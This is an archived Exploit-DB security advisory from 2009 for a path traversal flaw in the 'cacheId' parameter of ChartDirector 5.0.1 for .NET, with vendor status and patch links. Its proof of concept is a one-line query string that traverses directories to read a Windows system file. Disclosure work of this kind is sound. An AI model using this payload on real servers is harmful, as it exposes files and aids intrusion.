ChartDirector 5.0.1 - 'cacheId' Arbitrary File Disclosure

EDB-ID:

9612

CVE:



Author:

DokFLeed

Type:

webapps


Platform:

ASP

Date:

2009-09-09


====================================================
Advisory No.: ISNSC-0910
=============
ChartDirector Critical File Access

Information
======
Author: DokFLeed
Program Affected: http://www.chartdir.com for .NET
Version: 5.0.1
Severity: Critical.
Type of Advisory: Mid Disclosure.
Affected/Tested Versions: Random

Program Description
==================
Widely used Chart Component on Financial & Stock Trading websites

Overview
=========
The query variable "cacheId=" is not sanitized, it will can allow critical files download

Proof Of Concept
================
?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini

Solution/Fix
============
Upgrade to latest Chart Dir or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip

Vendor Status
============
The problem you mentions affect ChartDirector for .NET.
The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed. So this issue no longer occurs with the current version of ChartDirector for .NET.
For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version. They may also apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip

Reference
============
http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48

# milw0rm.com [2009-09-09]